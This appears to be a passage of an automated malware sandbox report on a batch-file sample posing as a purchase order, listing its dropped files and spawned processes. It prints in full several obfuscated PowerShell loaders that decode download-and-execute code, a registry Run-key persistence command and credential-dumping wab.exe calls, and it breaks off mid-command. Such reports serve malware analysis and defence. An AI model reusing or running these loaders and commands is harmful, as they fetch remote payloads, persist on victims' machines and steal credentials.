Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
|
ASCII text, with very long lines (4349), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Andragendet8.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\sfvnspt.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22ppql3u.lyk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sfmnaes.4ez.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htykarzd.z00.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgf52erv.xzo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4uslc30.jt3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sb520ipz.cem.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wactrupg.vkn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhv310C.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x6eec0579, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\g7Q9039
|
SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie
0x24, schema 4, UTF-8, version-valid-for 2
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Belinda103.Eft
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARZTWOM2N06S30R4R4G5.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Negligent.Gas
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 11 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat"
"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function
Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'(
$Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes
'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G
;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes
' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos
.e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap
BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes
'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily
(Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si
udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$
MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee
.r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae
otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde=
(Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW
etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs
S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r
oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily
(Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman
KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r=
.$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes
'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La
') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi:
CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ')
;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes '
U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim
Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne
nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU
eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x
Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle
,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H
sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li
ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function
Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'(
$Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes
'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G
;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes
' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos
.e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap
BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes
'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily
(Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si
udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$
MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee
.r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae
otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde=
(Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW
etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs
S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r
oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily
(Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman
KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r=
.$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes
'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La
') ;Sloshily (Indbandtes ' r$Stg ul RoRkbPlaDul O:ObFgroRurPaeLidSartraDrgResV.sViaI.lnoeUnnB,e ,=Su$ ogO,lSkoLabDeaw lMi:
CS .oRelcobSfrSpbBauSns kC,s 7Se3,a+E,+E,%Ls$ElBunllaoSud,ns ,kKoaAlmNosB,f,io RrSvh SoSal.od Ts n..rc .o ,uSyn ,t,n ')
;$Reveled=$Blodskamsforholds[$Foredragssalene];}$Governorates=288320;$Supermagtsstrategiernes=27821;Sloshily (Indbandtes '
U$ QgCalSmoC,bL,aFelNo:AmU dD l.nu efMitNonTri nns gOye Ir anFie , Fl=.o DaGRoeNotUn-FoCSnoWhnBot eCin tad Dr$suGUneWorCim
Da.ln CiHieUns,e ');Sloshily (Indbandtes ',p$FjgLulSnocib IaGll.o:C.KP lp,iNep,opUnebigskuAulBevHyeAmtAg Be=Ac P[JoSU,yBis,atUne
nmBo. vC.co InNovSveFurTit.i]Sk:.e:,aF ,rFioa.mWhBCoaPesCaeTo6An4AlS.itGerP i.rnP gG.(Te$GeU CdInlh uV,fLutRen iBanU,gP eS,rpanU
eAp) v ');Sloshily (Indbandtes 'Vl$Ungkvl So bPra,olPe: DIFlm,aaCog i,onCueE.d.e me=En ad[BiS FyRys .tKueedm S.EqT eL x
Dt L. .EVan,uc UoFldFliInnBogPa]Br:Up: ,ASaS aC.dI iIh .FiGA e,itMuSFotSor .iSkn Kg.u(St$CaKt lvei yp Op.leTog eu il,vvFle
,tPo)Os ');Sloshily (Indbandtes ' p$wigUrlUnoAbbBoaA lSm:V RUnuBrm.nsTutSleBurXaeFedFaesp=K,$ vISamNoaP,gSiiArn .eKod.f.H
sEyuPrbE s LtBerEriI n egSa(Di$ iGImoUdvSae UrHonAaoUprKoaOvt EeElsNv,b.$ dSV,uTipS eDor,rm,iaBigAftAfsDes BtIsrFaaFrtV,ebeg.li
ee VrI n ie .smo)Al ');Sloshily $Rumsterede;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ
/d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty
-Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function
Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'(
$dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres
'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng;
,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres
'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF
t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd
';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0
.3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE
= S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres
'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch
O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS
eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ
e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl
Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse
($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri
se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP
lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne
,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te
HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres
'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse
(Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni
Bo Bn,os .a TaRerBeeArn aeU =Am( ,TS.eDusUntE,-ciPUna tMihMa I$VaRBle ahDuaUnrEmd eFenGa)Pr ') ;Tilfredsstillelse (Viscometres
' $ IgArlBlocob Na,ulAr: kutadAgs ,i Ug TeFon UdJee S=F $,og Jl,roR,bEgaTalAf:R APomAlpFaeWirTeeCamNoeU tHirEkeFanNoePi+to+Au%.e$FaL
AeGav pe .r e SdSkeTasIm..ucChol uPhn.otLo ') ;$Bageriers=$Leveredes[$udsigende];}$Callovian=319492;$Malaceae=27246;Tilfredsstillelse
(Viscometres ' a$Lig.bl OoBab Haunl T:,hXPueEknSto ,pBeh oAmn BtToimacGa2 E4B 9Du Un=M, L.G.reUntTr- CCFuo.rn.utVee nSpt
O F$stRHyeMahCia .r,edMaeKknDi ');Tilfredsstillelse (Viscometres ' $AmgTrlG,oOvbNoa,ul A:.eHGry.epIno Cc nh IoTel ,eResTotF,e
ArB,i BnD.eLkmApi.ra.s En=Gr ,e[diS .yRes rt MeS.m a. oCT,osonV,vB.eBerG.tBe] s:Re:U,FR,rraoB mAyBSkahos,aeSt6.h4DuSCotI r.riConGrgRe(Sp$ScX
AeAbnS,oInpO.h DoavnMetLiiOvcVa2B,4Ra9 ) , ');Tilfredsstillelse (Viscometres ',o$.rgf,l KoDyb,oaPhlT :SaG dhKreHatInt KoAne
Ms S ,e=Ge K,[N,S TyIbs,at,fecomIn. eTlae Sx Rt U. SESpnS cAroFod,eiPanN,ggi]Ko:Ud:VeA.nSUnC.nIApI R.CyGPaeBitPoS RtAfrC iNenTagUd(
B$ HH.yPapE o Gc.eh AoTal,ee BsRet e Tr oi Kn SestmFiiAcaBl)Bl ');Tilfredsstillelse (Viscometres ',i$PrgPal Po vbPeaL.l
L:GoxL,yPrl,ooPapCoyOprP.o agStrPrak.p ohU,yBl=si$ oG PhDae ftUttSyoOre.rsHy. .s KuTybInsCatAprDriL.nw gTa(,a$PhCNiaE.lBilFloBrvB,i.aaKonMa,.e$inMKeaTrl
MaUncLae.aa eE.)G ');Tilfredsstillelse $xylopyrography;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function
Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'(
$dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres
'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng;
,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres
'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF
t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd
';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0
.3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE
= S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres
'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch
O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS
eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ
e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl
Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse
($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri
se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP
lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne
,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te
HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres
'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse
(Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,e4 t ');Tilfredsstillelse (Viscometres ' H$Pag il RoKrbP.aRilVe:InFVuuPosUni
